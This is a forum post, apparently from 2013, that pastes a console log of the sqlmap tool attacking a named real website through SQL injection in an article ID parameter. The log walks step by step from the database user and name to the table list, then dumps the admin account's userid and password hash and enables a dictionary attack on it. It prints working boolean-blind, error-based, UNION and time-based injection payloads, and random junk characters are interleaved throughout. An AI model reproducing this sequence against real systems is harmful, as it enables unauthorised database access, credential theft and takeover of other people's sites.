D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 a! k2 j* x9 ~4 G: d/ a% U
ms "Mysql" --current-user /* 注解:获取当前用户名称 v, ^4 t9 I6 o
sqlmap/0.9 - automatic SQL injection and database takeover tool
" t B- v' x# d7 |, [- R http://sqlmap.sourceforge.net starting at: 16:53:54
" p& u; j- k. t3 X6 t0 N4 `# g[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
3 h% g* v0 A, Z3 i' I) q" C! b4 r( o3 m session file
3 u% ^" p( m: o[16:53:54] [INFO] resuming injection data from session file
5 M9 @7 u9 V" ^[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file0 z) _; H( R- T/ J! L0 Q# |
[16:53:54] [INFO] testing connection to the target url
5 C X6 t" P- f5 c8 T0 Q3 Fsqlmap identified the following injection points with a total of 0 HTTP(s) reque
; M% H1 T9 @* s; n; k# Gsts:) G" J+ Q1 Y* D) G* r2 |
---
' Z1 \9 B4 T" fPlace: GET$ a# ~) V! ]( H
Parameter: id
' L6 _. a" M$ s6 L3 P Type: boolean-based blind
' o8 B- L4 o \+ [. S Title: AND boolean-based blind - WHERE or HAVING clause; k0 Q3 r5 R8 G0 t# a5 W0 E$ a) Y, Y
Payload: id=276 AND 799=799& ?/ K2 O% \# ?8 x; u! o
Type: error-based
2 q9 [. o/ {4 A% B Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
. P$ Q6 m0 k+ l Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 Y B: O0 S: W6 X$ P9 L
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% k$ n4 g/ r4 w& J! K$ f. {),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
/ R& C4 o h4 x) w) R; ^ Type: UNION query
0 x1 N9 b( { v4 p, T. e4 ~& u4 S Title: MySQL UNION query (NULL) - 1 to 10 columns
5 V$ O- `" U/ G& |; l. t Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
* j: _" E r9 ]# G* T- I# P6 ~(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
! I `- e5 c* p! W% e* k/ l0 I; B% LCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
: e, W! j5 ]' w" c' t6 d Type: AND/OR time-based blind
/ c/ \$ h+ P6 p Title: MySQL > 5.0.11 AND time-based blind' F a+ K1 D& @* m3 f8 v
Payload: id=276 AND SLEEP(5)
. I/ e. N+ k1 M---
: a8 Q5 t, i# J/ ?" i# G[16:53:55] [INFO] the back-end DBMS is MySQL
# J% X x, k1 ^web server operating system: Windows
; e' y9 v. ?& ^. F! Xweb application technology: Apache 2.2.11, PHP 5.3.0
& X9 ?, F) D1 U8 j9 iback-end DBMS: MySQL 5.0+ Y) L# g" O; u0 y% t- A+ c
[16:53:55] [INFO] fetching current user
6 D2 Q, v. _7 V' Z" s0 d9 Dcurrent user: 'root@localhost' , J; ? J+ e8 S4 ?+ Z1 W9 z0 Z
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou: Z/ x( @7 v. G v* O+ Z# M6 \1 N
tput\www.wepost.com.hk' shutting down at: 16:53:58
5 K+ C) x i$ z/ m q; @) n9 D$ ~" ?" V2 I5 Z i# Z m* L
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
' R9 T8 ]4 ]: I& G% s0 pms "Mysql" --current-db /*当前数据库
, u5 p4 \5 |; ?* p; M sqlmap/0.9 - automatic SQL injection and database takeover tool: u" q, x$ ?: i5 I$ A' L6 G6 `
http://sqlmap.sourceforge.net starting at: 16:54:16/ |% D* ?0 [3 ]
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
- j; W S# b9 t2 v% o session file' y2 y% F3 j2 S; h& p4 y" [
[16:54:16] [INFO] resuming injection data from session file
1 S G; c. I* f) J' f[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
# X) h/ u4 q" H3 K8 k$ P+ {* s8 u, @[16:54:16] [INFO] testing connection to the target url) K- j0 P. }& b% `8 n$ E# \6 f' j
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
1 X0 N- ^$ j3 r0 asts:
8 H" D) \4 h" D# I, h---
1 s2 a. j) F% B0 LPlace: GET/ L x/ @7 z C3 b- v5 ~
Parameter: id
4 k @. b. U: ]$ k0 C Type: boolean-based blind
- A# b; _ x3 u6 n* @8 Q Title: AND boolean-based blind - WHERE or HAVING clause
! y" m- c: S2 l* U' h# q- o9 Y+ f Payload: id=276 AND 799=799
a U8 ~% {5 _1 x" ] Type: error-based
" _$ X$ a- @3 b Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& {4 g; m8 {/ F, a; G5 W4 {
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 U/ h8 e7 L9 K, t# o120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) }4 x* K+ [7 V" l0 h8 z
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ E8 M: v* X- u8 g: l Type: UNION query. k- l& A. ~! ]4 D
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 }: Y9 o9 Z/ P9 E4 C Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# K$ U" D, \$ p9 K
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 P' b8 T: p: ?& U# n' d
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 G: _6 ~" U! R0 X6 e$ r
Type: AND/OR time-based blind% M5 \& e8 X9 p3 p& P
Title: MySQL > 5.0.11 AND time-based blind
+ R( b6 m y/ z/ D$ w. N Payload: id=276 AND SLEEP(5)
2 x. m3 }3 _6 w/ {% n" z---
5 K5 g/ q* q; L; w/ A6 Z[16:54:17] [INFO] the back-end DBMS is MySQL
4 ]( ?) x( I" ?web server operating system: Windows- Q; t/ x" c4 W. E' ^* f
web application technology: Apache 2.2.11, PHP 5.3.0
7 v$ F2 @+ T4 I0 s' ]" J wback-end DBMS: MySQL 5.0
1 K, c8 b$ Z: S5 n/ [# z' f r* a[16:54:17] [INFO] fetching current database
3 D0 z8 ^" R; h- Y0 v) j, `9 Bcurrent database: 'wepost'8 S6 \. m; u9 h# w& {' h. ]
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
& F, M9 U7 O: F- u5 J( H9 Stput\www.wepost.com.hk' shutting down at: 16:54:18
/ ?1 K" y5 e' v1 eD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
7 e$ [7 a" j6 `) j) |! k' b% ~ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名2 `% O1 s- k! u: m
sqlmap/0.9 - automatic SQL injection and database takeover tool
# `( @+ c# j. R1 w* E# t* y http://sqlmap.sourceforge.net starting at: 16:55:251 `) M7 Q1 K3 D' K3 q; I# ]. M6 {( x
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as; }+ Q5 t U5 G Q: E
session file1 A. U( Y9 C( O
[16:55:25] [INFO] resuming injection data from session file8 I0 K+ H u- O+ r1 [ K" ]6 w5 O
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file) d/ m* i. a% p# F
[16:55:25] [INFO] testing connection to the target url" c# ~" y/ g: [1 o& S
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 k; T, m& j4 Y' ^& l' \sts:
: w) u, s M; f5 v% m. H---. [/ r6 S( l9 H0 M4 T8 L# L5 `; P
Place: GET
9 Z Q. i2 w+ N V) G6 nParameter: id- p0 R: v/ l, q0 N9 D
Type: boolean-based blind. Q* @6 v; s, e* r! H
Title: AND boolean-based blind - WHERE or HAVING clause+ I5 Y( h6 x" R
Payload: id=276 AND 799=799
4 K8 ~5 V% D+ o7 D Type: error-based
, b# L' }9 U: |) |1 i0 p0 w) X. D Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause+ g9 v* ?: r$ W6 ^8 g
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,( B3 B! `9 B+ }) w# N2 w: S' e* s
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
& _, C. O' `& w+ ~5 ?),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)( X9 q) K8 G* g
Type: UNION query
7 E! u* @$ @5 j4 Y& X; Q Title: MySQL UNION query (NULL) - 1 to 10 columns
0 S1 ?9 y0 E a6 q5 |# |( r Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" k6 c+ W$ ~" G
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),& S( ?+ A A* H5 t3 u
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
% B/ R6 N3 B5 P7 E9 z4 ~ Type: AND/OR time-based blind
* ^0 | }3 b5 z) }+ B Title: MySQL > 5.0.11 AND time-based blind
( i; |- ^( @ P( J2 L Payload: id=276 AND SLEEP(5)
# X' @3 D# n. N' o. s% w---0 |3 w0 z- Q1 O9 k3 T! }/ Y
[16:55:26] [INFO] the back-end DBMS is MySQL
7 [5 R: i3 X @7 eweb server operating system: Windows2 g$ E+ e; u. `$ [% x
web application technology: Apache 2.2.11, PHP 5.3.0
3 g0 K. R4 s) P8 @7 {* A) Iback-end DBMS: MySQL 5.0
2 \3 E" x/ u/ z8 i[16:55:26] [INFO] fetching tables for database 'wepost') n# s. m# k5 y+ w$ v% J# q
[16:55:27] [INFO] the SQL query used returns 6 entries1 z/ r! S/ f6 T3 f4 K- O# V
Database: wepost9 P9 q! @, z4 t0 n! g( E
[6 tables]4 b7 j! O4 [$ q- ~% J' R! v
+-------------+9 g3 T* Y" l. H
| admin |1 R5 F1 @! I; ^3 z+ T
| article |
3 b- |& q" e. j' m" A| contributor |/ p3 Q' F' `. _% k r6 |3 i) }2 g
| idea |
0 |) ?$ U* d2 Q) u6 K| image |5 j2 D. ?# y9 }+ G$ m9 q
| issue |
6 ^! H: X5 M$ F$ [3 L+ M D6 n5 c+-------------+5 q8 h I. Q4 ?6 L3 |5 m
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# m, s% E! D6 _4 |
tput\www.wepost.com.hk' shutting down at: 16:55:33( s( H8 @' \) A H& Q6 H
) Y b \- [1 q" a3 T& jD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db. r- p& C1 Q# o, C
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名9 r. j1 y4 B8 b) [8 z. [
sqlmap/0.9 - automatic SQL injection and database takeover tool# B! f7 x+ I9 e9 B9 {1 @# i' T
http://sqlmap.sourceforge.net starting at: 16:56:06 K" O( O7 ], ^7 F
sqlmap identified the following injection points with a total of 0 HTTP(s) reque( K2 N8 H5 i7 }
sts:
: {" }1 x0 r4 f7 V0 k8 W! @---
9 ?& }( d4 {2 V" u; F2 w' hPlace: GET0 q$ w. w8 ^% `3 B( ?4 A' @
Parameter: id
1 Z2 j* D7 A, R) a! N/ J& u Type: boolean-based blind
( n# D2 F( L& A# g+ ] Title: AND boolean-based blind - WHERE or HAVING clause# m9 N, s5 }$ `
Payload: id=276 AND 799=799
0 f9 a6 s1 C, T3 J% I; o Type: error-based
s, W+ V- e# x/ |" n( x$ n Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ a, K* x& F. p4 i/ C A0 ^1 V Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
5 {7 e5 z0 q: I# p120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- c( q0 a8 [% X+ o),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
W+ }7 v [' b4 ~, j( ? Type: UNION query
, M g# R/ Z* R8 Q Title: MySQL UNION query (NULL) - 1 to 10 columns
, n8 K2 x) O) E4 j( H Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, D8 E3 _1 N+ F R# \6 k. r
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 b, q, Q) Z9 l5 C
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# _; w* L6 N& r5 x; N
Type: AND/OR time-based blind
6 \$ k G1 Z3 d/ A. e: I' e- ] Title: MySQL > 5.0.11 AND time-based blind
4 C9 q. J$ \% j9 B* a Payload: id=276 AND SLEEP(5)
8 E/ B' u- B4 g l. A% C---
7 H; L; O7 V/ Oweb server operating system: Windows/ n1 [ O# x; ]( q, H
web application technology: Apache 2.2.11, PHP 5.3.0
- B% O6 J- X u7 d& Hback-end DBMS: MySQL 5.0) \1 y& N; l: u8 \: Z
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se, U+ q( O: e9 j' d3 ?
ssion': wepost, wepost; `- s8 U" E$ g* D9 b
Database: wepost' A6 h1 n! c; Z
Table: admin
) ^9 t. N% @) A8 F) h; h7 B[4 columns]
4 g7 o* ]5 F2 ]) h9 X' f. t' ?+----------+-------------+
, A; O* I: P- E+ s| Column | Type |
$ k& X& T7 [" Q4 X. a0 {* p+----------+-------------+
+ L: X2 b8 F/ Z7 g: X7 x| id | int(11) |
& R) U9 Y; R/ u) n& R y| password | varchar(32) |
. i# M8 T3 z1 w) e| type | varchar(10) |
a: k" q- V. k# C: v| userid | varchar(20) |
2 o0 }7 Q* T6 C0 F# M% e6 ?- I+----------+-------------+# m' s& Z- z+ q2 c
shutting down at: 16:56:19$ F+ I9 A' S- k
0 d; ] ?* V& q: O) TD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& v6 {0 Q# _4 D$ |2 g
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容( M" K; x" L1 ` ^
sqlmap/0.9 - automatic SQL injection and database takeover tool% T. ?( M; z H, ~) P8 p* W
http://sqlmap.sourceforge.net starting at: 16:57:14
5 `2 _5 S. i1 x4 ]sqlmap identified the following injection points with a total of 0 HTTP(s) reque. u+ _/ a7 a8 k3 j0 G- K
sts:
9 A# G1 T# Q" T6 \---
$ v: v; Y: j# H9 h; N$ mPlace: GET
; C5 @* d) i( ZParameter: id4 J" V. F5 U" J5 ^2 D# ?; }* x
Type: boolean-based blind: H+ `! z) e' Y2 t
Title: AND boolean-based blind - WHERE or HAVING clause
( }( B u; @! L8 M$ F* ^ Payload: id=276 AND 799=799
9 _ h3 [/ `. }# p& V: w7 |. E6 d K, o1 V Type: error-based
3 L: j% [5 h2 ~' | Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ d, O5 Q: G$ d& i' i6 d7 m1 } Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. A$ W, g6 y! q% w3 E* q. L U
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,586 P3 w: g" z8 d2 L5 s! c" B
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) D. e: L( X: K* m7 ^" M. K2 p
Type: UNION query
8 J: n& `3 j# [" H2 F. ^ Title: MySQL UNION query (NULL) - 1 to 10 columns$ y1 C) {! V) k9 Y+ {3 U
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 F j0 w @: w/ X
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; G% [- C5 {. z) Q) M6 BCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
( d; C& m% B0 q8 O$ o$ d9 _7 p' w Type: AND/OR time-based blind. Y4 t$ q. e. I9 B5 V9 u
Title: MySQL > 5.0.11 AND time-based blind }' z+ ^/ u" u3 G" @6 ]7 [% r
Payload: id=276 AND SLEEP(5)
. V8 \: K3 J4 C6 x! f8 j, C---2 C. u# G# M, D, f. R
web server operating system: Windows3 S2 A; I9 U# d7 d6 ^
web application technology: Apache 2.2.11, PHP 5.3.01 l7 W6 C7 M1 ~* m8 D# F
back-end DBMS: MySQL 5.0
8 g' J7 ~$ O. I" Hrecognized possible password hash values. do you want to use dictionary attack o
4 i6 }& P0 U* o8 R; in retrieved table items? [Y/n/q] y: J( C S$ y' y# |, ?
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]& t* l# q7 `# C& @' r# [( U3 i
do you want to use common password suffixes? (slow!) [y/N] y1 d$ G7 Y& G$ |7 G8 a
Database: wepost4 `' f; f8 Y, T7 Z+ x# k$ n" S
Table: admin
. j4 n4 e5 f6 _* z[1 entry]
5 p U* T1 A! {% D+ Y4 J; l3 o+----------------------------------+------------+
7 ^- s% M% X( M| password | userid |
# w4 p( a) R" Z+----------------------------------+------------+' |" ~1 ~ p7 T& P
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
, C/ K. \- ^+ Y- y2 k' d+----------------------------------+------------+
5 ?1 N' d+ a5 ~' U+ e2 O shutting down at: 16:58:146 G& g. @5 D; r! k
8 p8 F! y: V) q: oD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对